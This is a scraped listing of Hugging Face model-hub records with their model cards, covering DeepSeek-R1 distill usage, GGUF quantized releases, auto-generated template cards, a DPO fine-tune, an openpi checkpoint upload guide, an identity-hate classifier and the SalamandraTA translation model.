**NOTE: Hugging Face's Transformers has not been directly supported yet.** ### DeepSeek-R1-Distill Models DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models. For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm): ```shell vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager ``` You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang) ```bash python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2 ``` ### Usage Recommendations **We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:** 1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs. 2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.** 3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}." 4. When evaluating model performance, it is recommended to conduct multiple tests and average the results. Additionally, we have observed that the DeepSeek-R1 series models tend to bypass thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance. **To ensure that the model engages in thorough reasoning, we recommend enforcing the model to initiate its response with "\<think\>\n" at the beginning of every output.** ## 7. License This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE). DeepSeek-R1 series support commercial use, allow for any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that: - DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and now finetuned with 800k samples curated with DeepSeek-R1. - DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE). - DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE). ## 8. Citation ``` @misc{deepseekai2025deepseekr1incentivizingreasoningcapability, title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning}, author={DeepSeek-AI}, year={2025}, eprint={2501.12948}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.12948}, } ``` ## 9. Contact If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
CHOOSEIT/MCQA_rsLoRA_DoRA_SM1AR_5E
CHOOSEIT
2025-05-30T07:56:00Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:55:14Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF
Bouquets
2025-05-30T07:55:31Z
5
0
transformers
[ "transformers", "gguf", "llama-cpp", "gguf-my-repo", "base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "license:mit", "endpoints_compatible", "region:us", "conversational" ]
null
2025-05-30T07:55:03Z
--- license: mit library_name: transformers tags: - llama-cpp - gguf-my-repo base_model: deepseek-ai/DeepSeek-R1-0528-Qwen3-8B --- # Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF This model was converted to GGUF format from [`deepseek-ai/DeepSeek-R1-0528-Qwen3-8B`](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ```
TOMFORD79/Tom9
TOMFORD79
2025-05-30T07:48:24Z
0
0
null
[ "safetensors", "any-to-any", "omega", "omegalabs", "bittensor", "agi", "license:mit", "region:us" ]
any-to-any
2025-05-30T07:40:55Z
--- license: mit tags: - any-to-any - omega - omegalabs - bittensor - agi --- This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet. Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
mradermacher/Zhi-writing-dsr1-14b-i1-GGUF
mradermacher
2025-05-30T07:47:40Z
686
2
transformers
[ "transformers", "gguf", "qwen2", "zh", "en", "dataset:Congliu/Chinese-DeepSeek-R1-Distill-data-110k", "dataset:cognitivecomputations/dolphin-r1", "dataset:open-thoughts/OpenThoughts-114k", "dataset:qihoo360/Light-R1-SFTData", "dataset:qihoo360/Light-R1-DPOData", "base_model:Zhihu-ai/Zhi-Create-DSR1-14B", "base_model:quantized:Zhihu-ai/Zhi-Create-DSR1-14B", "license:apache-2.0", "endpoints_compatible", "region:us", "imatrix", "conversational" ]
null
2025-04-19T11:38:03Z
--- base_model: Zhihu-ai/Zhi-Create-DSR1-14B datasets: - Congliu/Chinese-DeepSeek-R1-Distill-data-110k - cognitivecomputations/dolphin-r1 - open-thoughts/OpenThoughts-114k - qihoo360/Light-R1-SFTData - qihoo360/Light-R1-DPOData language: - zh - en library_name: transformers license: apache-2.0 quantized_by: mradermacher tags: - qwen2 --- ## About <!-- ### quantize_version: 2 --> <!-- ### output_tensor_quantised: 1 --> <!-- ### convert_type: hf --> <!-- ### vocab_type: --> <!-- ### tags: nicoboss --> weighted/imatrix quants of https://huggingface.co/Zhihu-ai/Zhi-Create-DSR1-14B <!-- provided-files --> static quants are available at https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-GGUF ## Usage If you are unsure how to use GGUF files, refer to one of [TheBloke's READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for more details, including on how to concatenate multi-part files. ## Provided Quants (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) | Link | Type | Size/GB | Notes | |:-----|:-----|--------:|:------| | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ1_S.gguf) | i1-IQ1_S | 3.7 | for the desperate | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ1_M.gguf) | i1-IQ1_M | 4.0 | mostly desperate | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_XXS.gguf) | i1-IQ2_XXS | 4.4 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_XS.gguf) | i1-IQ2_XS | 4.8 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_S.gguf) | i1-IQ2_S | 5.1 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ2_M.gguf) | i1-IQ2_M | 5.5 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q2_K_S.gguf) | i1-Q2_K_S | 5.5 | very low quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q2_K.gguf) | i1-Q2_K | 5.9 | IQ3_XXS probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_XXS.gguf) | i1-IQ3_XXS | 6.0 | lower quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_XS.gguf) | i1-IQ3_XS | 6.5 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q3_K_S.gguf) | i1-Q3_K_S | 6.8 | IQ3_XS probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_S.gguf) | i1-IQ3_S | 6.8 | beats Q3_K* | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ3_M.gguf) | i1-IQ3_M | 7.0 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q3_K_M.gguf) | i1-Q3_K_M | 7.4 | IQ3_S probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q3_K_L.gguf) | i1-Q3_K_L | 8.0 | IQ3_M probably better | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ4_XS.gguf) | i1-IQ4_XS | 8.2 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_0.gguf) | i1-Q4_0 | 8.6 | fast, low quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-IQ4_NL.gguf) | i1-IQ4_NL | 8.6 | prefer IQ4_XS | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_K_S.gguf) | i1-Q4_K_S | 8.7 | optimal size/speed/quality | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_K_M.gguf) | i1-Q4_K_M | 9.1 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q4_1.gguf) | i1-Q4_1 | 9.5 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q5_K_S.gguf) | i1-Q5_K_S | 10.4 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q5_K_M.gguf) | i1-Q5_K_M | 10.6 | | | [GGUF](https://huggingface.co/mradermacher/Zhi-writing-dsr1-14b-i1-GGUF/resolve/main/Zhi-writing-dsr1-14b.i1-Q6_K.gguf) | i1-Q6_K | 12.2 | practically like static Q6_K | Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png) And here are Artefact2's thoughts on the matter: https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9 ## FAQ / Model Request See https://huggingface.co/mradermacher/model_requests for some answers to questions you might have and/or if you want some other model quantized. ## Thanks I thank my company, [nethype GmbH](https://www.nethype.de/), for letting me use its servers and providing upgrades to my workstation to enable this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his private supercomputer, enabling me to provide many more imatrix quants, at much higher quality, than I would otherwise be able to. <!-- end -->
Fotiissss/whisper-large-v3-turbo-lora-merged
Fotiissss
2025-05-30T07:47:06Z
2
0
transformers
[ "transformers", "safetensors", "whisper", "automatic-speech-recognition", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
automatic-speech-recognition
2025-05-30T07:44:07Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7
AmberYifan
2025-05-30T07:46:20Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "base_model:finetune:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:25:54Z
--- base_model: AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF library_name: transformers model_name: Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7 This model is a fine-tuned version of [AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF](https://huggingface.co/AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.8-lr1e-7", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/yifanwang/huggingface/runs/ooli2zcv) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.12.2 - Transformers: 4.46.3 - Pytorch: 2.7.0 - Datasets: 3.6.0 - Tokenizers: 0.20.3 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
robotgeneralist/openpi-nomagic
robotgeneralist
2025-05-30T07:45:37Z
0
0
null
[ "license:mit", "region:us" ]
null
2025-04-14T18:14:58Z
--- license: mit --- # Nomagic Simple / Adversarial Box Model Checkpoints This is a repo to store the most important checkpoints of the `openpi` model. ## Uploading checkpoints Since the checkpoints are huge, the fastest and most reliable way to upload them is by using the `upload-large-folder` command from `huggingface-cli`. To do so, you first have to log in with appropriate credentials (you need a token with write permissions to the target repository): ``` huggingface-cli login ``` Next, use `upload-large-folder`. For example, to upload the `checkpoints` directory to the remote repository, run: ``` huggingface-cli upload-large-folder robotgeneralist/openpi-nomagic-multibox checkpoints --repo-type=model ``` Note that there is no way to specify a target path where the data will be stored on the remote. The contents of the directory will be placed under the root directory. So, for example, if your local folder is organized like the following: ``` checkpoints --some-dir --file1 --file2 ``` after uploading to the remote, you will have: ``` some-dir --file1 --file2 ``` Luckily, you can still upload additional files later on. For example, if after the first upload you try to upload: ``` checkpoints --some-dir --file3 --file4 ``` the remote will become: ``` some-dir --file1 --file2 --file3 --file4 ``` Hence, even though slightly inconvenient, this seems to be the best method for uploading big checkpoints, because of its efficiency and robustness.
Mridul2003/identity-hate-detector
Mridul2003
2025-05-30T07:42:46Z
2
0
null
[ "safetensors", "bert", "base_model:unitary/toxic-bert", "base_model:finetune:unitary/toxic-bert", "region:us" ]
null
2025-05-28T08:26:04Z
--- metrics: - accuracy base_model: - unitary/toxic-bert --- Use Model ```bash from transformers import pipeline, AutoTokenizer, AutoModelForSequenceClassification device = torch.device("cuda" if torch.cuda.is_available() else "cpu") identity_model = AutoModelForSequenceClassification.from_pretrained("Mridul2003/identity-hate-detector").to(device) identity_tokenizer = AutoTokenizer.from_pretrained("Mridul2003/identity-hate-detector") identity_inputs = identity_tokenizer(final_text, return_tensors="pt", padding=True, truncation=True) if 'token_type_ids' in identity_inputs: del identity_inputs['token_type_ids'] identity_inputs = {k: v.to(device) for k, v in identity_inputs.items()} with torch.no_grad(): identity_outputs = identity_model(**identity_inputs) identity_probs = torch.sigmoid(identity_outputs.logits) identity_prob = identity_probs[0][1].item() not_identity_prob = identity_probs[0][0].item() results["identity_hate_custom"] = identity_prob results["not_identity_hate_custom"] = not_identity_prob ``` # Offensive Language Classifier (Fine-Tuned on Custom Dataset) This repository contains a fine-tuned version of the [`unitary/toxic-bert`](https://huggingface.co/unitary/toxic-bert) model for binary classification of offensive language (labels: `Offensive` vs `Not Offensive`). The model has been specifically fine-tuned on a custom dataset due to limitations observed in the base model's performance — particularly with `identity_hate` related content. --- ## 🔍 Problem with Base Model (`unitary/toxic-bert`) The original `unitary/toxic-bert` model is trained for multi-label toxicity detection with 6 categories: - toxic - severe toxic - obscene - threat - insult - identity_hate While it performs reasonably well on generic toxicity, **it struggles with edge cases involving identity-based hate speech** — often: - Misclassifying subtle or sarcastic identity attacks - Underestimating offensive content with identity-specific slurs --- ## ✅ Why Fine-Tune? We fine-tuned the model on a custom annotated dataset with two clear labels: - `0`: Not Identity Hate - `1`: Identity Hate The new model simplifies the task into a **binary classification problem**, allowing more focused training for real-world moderation scenarios. --- ## 📊 Dataset Overview - Total examples: ~4,000+ - Balanced between offensive and non-offensive labels - Contains high proportions of `identity_hate`, `obscene`, `insult`, and more nuanced samples --- ## 🧠 Model Details - **Base model**: [`unitary/toxic-bert`](https://huggingface.co/unitary/toxic-bert) - **Fine-tuned using**: Hugging Face 🤗 `Trainer` API - **Loss function**: CrossEntropyLoss (via `num_labels=2`) - **Batch size**: 8 - **Epochs**: 3 - **Learning rate**: 2e-5 --- ## 🔬 Performance (Binary Classification) | Metric | Value | |----------|---------| | Accuracy | ~92% | | Precision / Recall | Balanced | ---
2yunadaaa/qwen2.5-4b-3kingdoms-augmented
2yunadaaa
2025-05-30T07:39:54Z
0
0
transformers
[ "transformers", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-05-30T07:39:43Z
--- base_model: unsloth/qwen2.5-7b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** 2yunadaaa - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-7b-instruct-unsloth-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
BSC-LT/salamandraTA-7B-instruct-GGUF
BSC-LT
2025-05-30T07:37:46Z
262
0
transformers
[ "transformers", "gguf", "llama", "text-generation", "translation", "bg", "ca", "cs", "cy", "da", "de", "el", "en", "es", "et", "eu", "fi", "fr", "ga", "gl", "hr", "hu", "it", "lt", "lv", "mt", "nl", "nb", "no", "nn", "oc", "pl", "pt", "ro", "ru", "sl", "sk", "sr", "sv", "uk", "ast", "an", "base_model:BSC-LT/salamandraTA-7b-instruct", "base_model:quantized:BSC-LT/salamandraTA-7b-instruct", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:eu", "conversational" ]
translation
2025-03-03T08:38:47Z
--- library_name: transformers license: apache-2.0 pipeline_tag: translation language: - bg - ca - cs - cy - da - de - el - en - es - et - eu - fi - fr - ga - gl - hr - hu - it - lt - lv - mt - nl - nb - 'no' - nn - oc - pl - pt - ro - ru - sl - sk - sr - sv - uk - ast - an base_model: - BSC-LT/salamandraTA-7b-instruct --- ![image/png](https://cdn-uploads.huggingface.co/production/uploads/633b489acbdbadd99c0b75ef/MhsW4ODhK6ofYq8DnpyKc.png) # SalamandraTA-7B-instruct-GGUF Model Card This model is the GGUF-quantized version of [SalamandraTA-7b-instruct](https://huggingface.co/BSC-LT/salamandraTA-7b-instruct). The model weights are quantized from FP16 to Q4_K_M quantization Q8_0 (8-bit quantization), (4-bit weights with K-means clustering quantization) and Q3_K_M (3-but weights with K-means clustering quantization) using the [Llama.cpp](https://github.com/ggml-org/llama.cpp) framework. Inferencing with this model can be done using [VLLM](https://docs.vllm.ai/en/stable/models/engine_args.html). SalamandraTA-7b-instruct is a translation LLM that has been instruction-tuned from SalamandraTA-7b-base. 